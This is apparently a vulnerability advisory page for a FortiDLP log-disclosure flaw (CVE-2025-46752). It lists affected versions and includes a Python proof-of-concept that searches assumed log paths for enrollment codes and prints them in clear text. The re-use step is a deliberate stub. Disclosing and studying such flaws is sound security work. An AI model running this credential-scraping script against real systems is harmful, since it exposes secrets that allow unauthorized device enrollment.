Insertion of sensitive information into a log file in Fortinet FortiDLP 12.0.0 through 12.0.5, 11.5.1, 11.4.6 and 11.4.5 allows an attacker to obtain sensitive information (information disclosure) by re-using a logged enrollment code.
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Fortinet FortiDLP 12.0.0
Fortinet FortiDLP 12.0.1
Fortinet FortiDLP 12.0.2
Fortinet FortiDLP 12.0.3
Fortinet FortiDLP 12.0.4
Fortinet FortiDLP 12.0.5
Fortinet FortiDLP 11.5.1
Fortinet FortiDLP 11.4.6
Fortinet FortiDLP 11.4.5
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
# CVE-2025-46752 PoC - FortiDLP Enrollment Code Log Disclosure
# This PoC demonstrates how an attacker who can read FortiDLP log files (local
# read access to the log directory is assumed) could extract enrollment codes
# that were written to the logs in clear text. Log locations and the log-line
# format below are assumptions, not taken from the vendor advisory.
import os
import re
import sys
# Candidate FortiDLP log locations to scan.
# NOTE(review): these paths are assumptions about a typical install, not
# taken from the vendor advisory -- confirm against a real deployment before
# treating a "not found" result as negative.
_POSIX_LOG_PATHS = [
    "/var/log/fortidlp/fortidlp.log",
    "/opt/fortidlp/logs/application.log",
    "/usr/local/fortidlp/logs/enrollment.log",
    "/var/log/fortidlp/enrollment.log",
]
_WINDOWS_LOG_PATHS = [
    "C:\\Program Files\\Fortinet\\FortiDLP\\logs\\fortidlp.log",
    "C:\\ProgramData\\Fortinet\\FortiDLP\\logs\\enrollment.log",
]
# Order only affects report order; POSIX candidates are tried first.
LOG_PATHS = _POSIX_LOG_PATHS + _WINDOWS_LOG_PATHS
# Heuristic matcher for "label <sep> value" log entries.
# Group 1 is the label (enrollment code / registration code / enroll token,
# with an optional space or underscore), group 2 is the value: 8-64 chars of
# [A-Za-z0-9_-]. The label list and length bound are guesses about the log
# format, not derived from the advisory; expect false negatives if FortiDLP
# logs the code under another name or the value uses other characters.
_CODE_LABELS = (
    r"enrollment[\s_]?code",
    r"registration[\s_]?code",
    r"enroll[\s_]?token",
)
_CODE_VALUE = r"[A-Za-z0-9_-]{8,64}"
ENROLLMENT_CODE_PATTERN = re.compile(
    "(" + "|".join(_CODE_LABELS) + r")[\s:=]+(" + _CODE_VALUE + ")",
    re.IGNORECASE,
)
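def search_log_files(paths: "list[str] | None" = None,
                     pattern: "re.Pattern[str] | None" = None) -> "list[dict[str, str]]":
    """Scan candidate FortiDLP log files for enrollment-code-like values.

    Args:
        paths: Log file paths to inspect. Defaults to the module's LOG_PATHS.
            Paths that do not exist are skipped without output.
        pattern: Compiled regex with exactly two groups, (label, value).
            Defaults to the module's ENROLLMENT_CODE_PATTERN.

    Returns:
        A list of dicts with keys "type" (matched label), "code" (matched
        value) and "source" (file path), in file and match order. Empty when
        nothing matched or no candidate file was readable.

    Side effects:
        Prints progress to stdout, including each extracted value in clear
        text. Treat that output as credential material: a captured terminal
        or CI log holds the same enrollment code the vulnerability leaked.
    """
    if paths is None:
        paths = LOG_PATHS
    if pattern is None:
        pattern = ENROLLMENT_CODE_PATTERN

    found_codes = []
    for log_path in paths:
        # Most candidates are absent on any given host; skip them quietly so
        # the "Checking" line only appears for files that actually exist.
        if not os.path.exists(log_path):
            continue
        print(f"[*] Checking log file: {log_path}")
        try:
            # errors="ignore": a stray non-UTF-8 byte must not abort the scan.
            # The whole file is read (not line by line) because the pattern's
            # [\s:=]+ separator may legitimately span a line break.
            with open(log_path, "r", encoding="utf-8", errors="ignore") as f:
                content = f.read()
        except PermissionError:
            print(f"[-] Permission denied: {log_path}")
            continue
        except OSError as exc:
            # Other I/O failures (a directory, EIO, ...) are reported and
            # skipped so one bad path does not stop the remaining candidates.
            print(f"[-] Error reading {log_path}: {exc}")
            continue
        for code_type, code_value in pattern.findall(content):
            found_codes.append({
                "type": code_type,
                "code": code_value,
                "source": log_path,
            })
            print(f"[+] Found {code_type}: {code_value}")
    return found_codes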
def reuse_enrollment_code(code):
    """Placeholder for the re-use step: print what would happen, return True.

    No network activity takes place; nothing here contacts a FortiDLP
    management server. The function only echoes `code` in clear text and
    states the impact, so callers must not read the True return value as
    confirmation that an unauthorized enrollment actually succeeded.
    """
    banner = f"\n[*] Attempting to reuse enrollment code: {code}"
    impact = "[!] This would allow unauthorized device enrollment"
    # A live exploit would submit the code to the management server's
    # agent-registration flow; deliberately left unimplemented.
    for line in (banner, impact):
        print(line)
    return True
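def main() -> int:
    """Run the log scan, report findings, and return a process exit status.

    Returns 0 when at least one enrollment code was found (the leak was
    demonstrated on this host) and 1 otherwise, so the script can drive a
    wrapper or CI check instead of requiring someone to read the output.
    Findings are printed in clear text; handle the transcript as you would
    the credential itself.
    """
    banner = "=" * 60
    print(banner)
    print("CVE-2025-46752 - FortiDLP Enrollment Code Disclosure PoC")
    print(banner)
    codes = search_log_files()
    if not codes:
        print("\n[-] No enrollment codes found in accessible log files")
        print("[*] Try running with elevated privileges or check additional log paths")
        return 1
    print(f"\n[!] Total enrollment codes found: {len(codes)}")
    for code_info in codes:
        # reuse_enrollment_code() is a stub: it reports impact, it does not
        # contact the management server.
        reuse_enrollment_code(code_info["code"])
    return 0


if __name__ == "__main__":
    sys.exit(main())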